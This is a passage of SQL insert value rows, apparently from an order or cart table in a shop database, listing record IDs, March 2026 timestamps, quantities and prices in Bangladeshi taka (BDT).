(770, 1, '2026-03-29 20:35:22', '2026-03-29 20:35:22', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(771, 1, '2026-03-29 20:35:23', '2026-03-29 20:35:23', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(772, 1, '2026-03-29 20:35:24', '2026-03-29 20:35:24', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(773, 1, '2026-03-29 20:35:26', '2026-03-29 20:35:26', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(774, 1, '2026-03-29 20:35:27', '2026-03-29 20:35:27', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(775, 1, '2026-03-29 20:35:28', '2026-03-29 20:35:28', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(776, 1, '2026-03-29 20:35:36', '2026-03-29 20:35:37', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(777, 1, '2026-03-29 20:35:41', '2026-03-29 20:35:42', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(778, 1, '2026-03-29 20:35:46', '2026-03-29 20:35:47', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(779, 1, '2026-03-29 20:35:51', '2026-03-29 20:35:52', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(780, 1, '2026-03-29 20:35:56', '2026-03-29 20:35:57', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(781, 1, '2026-03-29 21:24:52', '2026-03-29 21:25:16', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(782, 1, '2026-03-29 21:24:57', '2026-03-29 21:24:57', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(783, 1, '2026-03-29 21:24:58', '2026-03-29 21:24:58', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(784, 1, '2026-03-29 21:24:59', '2026-03-29 21:24:59', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(785, 1, '2026-03-29 21:25:01', '2026-03-29 21:25:01', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(786, 1, '2026-03-29 21:25:02', '2026-03-29 21:25:02', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(787, 1, '2026-03-29 21:25:03', '2026-03-29 21:25:03', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(788, 1, '2026-03-29 21:25:05', '2026-03-29 21:25:05', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(789, 1, '2026-03-29 21:25:06', '2026-03-29 21:25:06', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(790, 1, '2026-03-29 21:25:08', '2026-03-29 21:25:08', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(791, 1, '2026-03-29 21:25:09', '2026-03-29 21:25:09', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(792, 1, '2026-03-29 21:25:11', '2026-03-29 21:25:11', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(793, 1, '2026-03-29 21:25:12', '2026-03-29 21:25:12', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(794, 1, '2026-03-29 21:25:20', '2026-03-29 21:25:21', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(795, 1, '2026-03-29 21:25:25', '2026-03-29 21:25:27', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(796, 1, '2026-03-29 21:25:31', '2026-03-29 21:25:32', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(797, 1, '2026-03-29 21:25:36', '2026-03-29 21:25:36', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(798, 1, '2026-03-29 21:25:41', '2026-03-29 21:25:41', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(799, 1, '2026-03-29 23:33:15', '2026-03-29 23:33:15', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(800, 1, '2026-03-30 01:09:32', '2026-03-30 01:09:34', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(801, 1, '2026-03-30 06:42:47', '2026-03-30 06:42:50', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(802, 1, '2026-03-30 07:16:39', '2026-03-30 07:16:39', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(803, 1, '2026-03-30 09:42:56', '2026-03-30 09:43:18', NULL, 1, 0, 0, 1, 5.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 1688.0000, 1688.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 2110.0000, 2110.0000, 1688.0000, 1688.0000, 1, 0, NULL, NULL, 0),
(804, 1, '2026-03-30 12:37:19', '2026-03-30 12:37:23', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(805, 1, '2026-03-30 15:04:49', '2026-03-30 15:04:49', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(806, 1, '2026-03-30 18:31:46', '2026-03-30 18:31:48', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(807, 1, '2026-03-30 22:29:11', '2026-03-30 22:29:11', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(808, 1, '2026-03-31 00:14:14', '2026-03-31 00:14:18', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(809, 1, '2026-03-31 06:01:47', '2026-03-31 06:01:51', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(810, 1, '2026-03-31 06:06:12', '2026-03-31 06:06:12', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(811, 1, '2026-03-31 12:05:30', '2026-03-31 12:05:35', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(812, 1, '2026-03-31 16:03:46', '2026-03-31 16:03:46', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(813, 1, '2026-03-31 18:10:12', '2026-03-31 18:10:17', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(814, 1, '2026-03-31 18:28:31', '2026-03-31 18:28:59', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(815, 1, '2026-03-31 18:28:37', '2026-03-31 18:28:37', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(816, 1, '2026-03-31 18:28:38', '2026-03-31 18:28:38', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(817, 1, '2026-03-31 18:28:40', '2026-03-31 18:28:40', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(818, 1, '2026-03-31 18:28:41', '2026-03-31 18:28:41', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(819, 1, '2026-03-31 18:28:43', '2026-03-31 18:28:43', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(820, 1, '2026-03-31 18:28:44', '2026-03-31 18:28:44', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(821, 1, '2026-03-31 18:28:46', '2026-03-31 18:28:46', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(822, 1, '2026-03-31 18:28:48', '2026-03-31 18:28:48', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(823, 1, '2026-03-31 18:28:49', '2026-03-31 18:28:49', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(824, 1, '2026-03-31 18:28:51', '2026-03-31 18:28:51', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(825, 1, '2026-03-31 18:28:52', '2026-03-31 18:28:52', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(826, 1, '2026-03-31 18:28:54', '2026-03-31 18:28:54', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(827, 1, '2026-03-31 18:29:03', '2026-03-31 18:29:04', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(828, 1, '2026-03-31 18:29:08', '2026-03-31 18:29:09', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(829, 1, '2026-03-31 18:29:13', '2026-03-31 18:29:14', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
(830, 1, '2026-03-31 18:29:19', '2026-03-31 18:29:20', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 256.8000, 256.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 321.0000, 321.0000, 256.8000, 256.8000, 1, 0, NULL, NULL, 0),
